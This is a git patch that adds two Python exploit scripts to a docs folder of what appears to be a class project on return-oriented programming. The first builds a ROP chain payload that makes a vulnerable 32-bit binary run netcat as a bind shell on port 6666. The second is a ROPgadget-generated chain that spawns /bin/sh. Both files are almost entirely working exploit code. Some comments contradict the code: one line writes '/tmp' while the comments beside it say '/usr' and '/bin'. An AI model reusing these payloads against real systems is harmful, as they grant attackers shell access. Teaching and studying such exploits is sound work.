From b5ef4f9a27ed51992f25c7306f91b3060a7e2fc2 Mon Sep 17 00:00:00 2001
From: Liam Dalgarno <liamdalg99@gmail.com>
Date: Sat, 28 Nov 2020 17:40:49 +0000
Subject: [PATCH] Add example scripts

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
---
 docs/exploit-nc.py       | 168 +++++++++++++++++++++++++++++++++++++++
 docs/script_reference.py |  80 +++++++++++++++++++
 2 files changed, 248 insertions(+)
 create mode 100644 docs/exploit-nc.py
 create mode 100644 docs/script_reference.py

diff --git a/docs/exploit-nc.py b/docs/exploit-nc.py
new file mode 100644
index 0000000..bb99d77
--- /dev/null
+++ b/docs/exploit-nc.py
@@ -0,0 +1,168 @@
+"""
+This is a demo python script that creates a ROP chain to launch nc as:
+> /bin//nc -lnp 6666 -tte /bin//sh
+The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
+With the latest ROPGadget tool that we used in the class, we get the following ropchain:
+- Step 1 -- Write-what-where gadgets
+
+	[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
+	[+] Gadget found: 0x806ee8b pop edx ; ret
+	[+] Gadget found: 0x80a8bf6 pop eax ; ret
+	[+] Gadget found: 0x80562c0 xor eax, eax ; ret
+
+- Step 2 -- Init syscall number gadgets
+
+	[+] Gadget found: 0x80562c0 xor eax, eax ; ret
+	[+] Gadget found: 0x807c32a inc eax ; ret
+
+- Step 3 -- Init syscall arguments gadgets
+
+	[+] Gadget found: 0x80481c9 pop ebx ; ret
+	[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
+	[+] Gadget found: 0x806ee8b pop edx ; ret
+
+- Step 4 -- Syscall gadget
+
+	[+] Gadget found: 0x8049603 int 0x80
+
+- Step 5 -- Build the ROP chain
+
+
+
+"""
+
+
+
+
+
+#!/usr/bin/env python
+from struct import pack
+import os
+######################################
+fileName=raw_input("Enter the file name")
+outfile=open(fileName, "wb")
+# this is just to create variables of the gadgets that we will be using
+DATA       = 0x080da120
+EDAX0      = pack("<I", 0x08050a88)
+STACK      = pack("<I", DATA)       # @ .data 
+INT80      = pack("<I", 0x08049603) # int 0x80
+MOVISTACK  = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
+INCEAX     = pack("<I", 0x0807c32a) # inc eax ; ret
+POPEDX     = pack("<I", 0x0806ee8b) # pop edx ; ret
+POPECXEBX  = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
+POPEAX     = pack("<I", 0x080a8bf6) # pop eax ; ret
+XOREAX     = pack("<I", 0x080562c0) # xor eax, eax ; ret
+DUMMY      = pack("<I", 0x42424242) # padding
+
+buff  = "\x42" * 32
+buff += "BBBB"*3
+
+buff += POPEDX 				# it's via %ecx we will build our stack.
+buff += STACK				# %ecx contain the stack address.
+
+buff += POPEAX				# Lets put content in an address
+buff += "/tmp"				# put "/usr" in %eax
+buff += MOVISTACK			# put "/bin" in stack address
+
+buff += POPEDX
+buff += pack("<I", DATA + 4)	# we change our stack for to point after "/bin"
+
+buff += POPEAX				# Applying the same for "/nc"
+buff += "//nc"
+buff += MOVISTACK			# we place "//nc" after "/bin"
+
+buff += POPEDX
+buff += pack("<I", DATA + 9)	# we change our stack for to point after "bin//nc"+1
+
+# we repeated operation for each argument
+buff += POPEAX
+buff += "-lnp"
+buff += MOVISTACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 14)
+
+buff += POPEAX
+buff += "6666"
+buff += MOVISTACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 19)
+
+buff += POPEAX
+buff += "-tte"
+buff += MOVISTACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 24)
+
+buff += POPEAX
+buff += "/bin"
+buff += MOVISTACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 28)
+
+buff += POPEAX
+buff += "//sh"
+buff += MOVISTACK
+
+#
+# We currently have our list of elements separated by \0
+# Now we must construct our char ** i.e. array 'argguments' of strings
+# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
+# 
+
+buff += POPEDX				
+buff += pack("<I", DATA + 60)	# shadow stack address (@ of arguments)
+
+buff += POPEAX
+buff += pack("<I", DATA) 		# @ of "/bin//nc" 0th item of arguments[]
+buff += MOVISTACK			# we place address of "/bin//nc" in our STACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 64)	# we shift our Stack Pointer + 4 for the second argument
+
+buff += POPEAX
+buff += pack("<I", DATA + 0x9) 		# @ of "-lnp"
+buff += MOVISTACK			# we place address of "-lnp" in our STACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 68)	# we shift our Stack Pointer + 4 for the 3rd argument
+
+buff += POPEAX
+buff += pack("<I", DATA + 0xe) 		# @ of "6666"
+buff += MOVISTACK			# we palce address of "6666" in our STACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 72)	# we shift our Stack Pointer + 4 for the 4th argument
+
+buff += POPEAX
+buff += pack("<I", DATA + 0x13) 		# @ of "-tte"
+buff += MOVISTACK			# we place address of "-tte" in our STACK
+
+buff += POPEDX
+buff += pack("<I", DATA + 76)	# we shift our Stack Pointer + 4 for the 5th argument
+
+buff += POPEAX
+buff += pack("<I", DATA + 0x18) 		# @ of "/bin//sh"
+buff += MOVISTACK			# we place address of "/bin//sh" in our STACK
+
+    #
+    # Now we must implement eax to contain the address of 
+    # the execve syscall.
+    # execve = 0xb
+    #
+
+buff += XOREAX				# %eax is put to zero.
+buff += INCEAX * 11			# %eax is now 0xb
+buff += POPEDX				# last pop 
+buff += pack("<I", DATA + 48) 	# edx char *env
+buff += POPECXEBX				# last pop 
+buff += pack("<I", DATA + 60) 	# ecx char **arguments
+buff += pack("<I", DATA)      	# ebx "/usr/bin//nc"
+buff += INT80				# we execute
+outfile.write(buff)
+outfile.close()
+
+#print buff
diff --git a/docs/script_reference.py b/docs/script_reference.py
new file mode 100644
index 0000000..e55b6e7
--- /dev/null
+++ b/docs/script_reference.py
@@ -0,0 +1,80 @@
+
+# ROP chain generation
+# ===========================================================
+
+# - Step 1 -- Write-what-where gadgets
+
+# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
+# [+] Gadget found: 0x806e23b pop edx ; ret
+# [+] Gadget found: 0x80a89e6 pop eax ; ret
+# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
+
+# - Step 2 -- Init syscall number gadgets
+
+# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
+# [+] Gadget found: 0x807b6da inc eax ; ret
+
+# - Step 3 -- Init syscall arguments gadgets
+
+# [+] Gadget found: 0x80481c9 pop ebx ; ret
+# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
+# [+] Gadget found: 0x806e23b pop edx ; ret
+
+# - Step 4 -- Syscall gadget
+
+# [+] Gadget found: 0x80495f3 int 0x80
+
+# - Step 5 -- Build the ROP chain
+
+#!/usr/bin/env python2
+# execve generated by ROPgadget
+
+from struct import pack
+
+import sys
+
+out_file = sys.argv[1]
+
+p = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
+
+p += pack('<I', 0x0806e23b) # pop edx ; ret
+p += pack('<I', 0x080d9060) # @ .data
+p += pack('<I', 0x080a89e6) # pop eax ; ret
+p += b'/bin'
+p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x0806e23b) # pop edx ; ret
+p += pack('<I', 0x080d9064) # @ .data + 4
+p += pack('<I', 0x080a89e6) # pop eax ; ret
+p += b'//sh'
+p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x0806e23b) # pop edx ; ret
+p += pack('<I', 0x080d9068) # @ .data + 8
+p += pack('<I', 0x080562b0) # xor eax, eax ; ret
+p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x080481c9) # pop ebx ; ret
+p += pack('<I', 0x080d9060) # @ .data
+p += pack('<I', 0x0806e262) # pop ecx ; pop ebx ; ret
+p += pack('<I', 0x080d9068) # @ .data + 8
+p += pack('<I', 0x080d9060) # padding without overwrite ebx
+
+p += pack('<I', 0x0806e23b) # pop edx ; ret
+p += pack('<I', 0x080d9068) # @ .data + 8
+p += pack('<I', 0x080562b0) # xor eax, eax ; ret
+
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x0807b6da) # inc eax ; ret
+p += pack('<I', 0x080495f3) # int 0x80
+
+
+with open(out_file, "wb") as f:
+    f.write(p)
+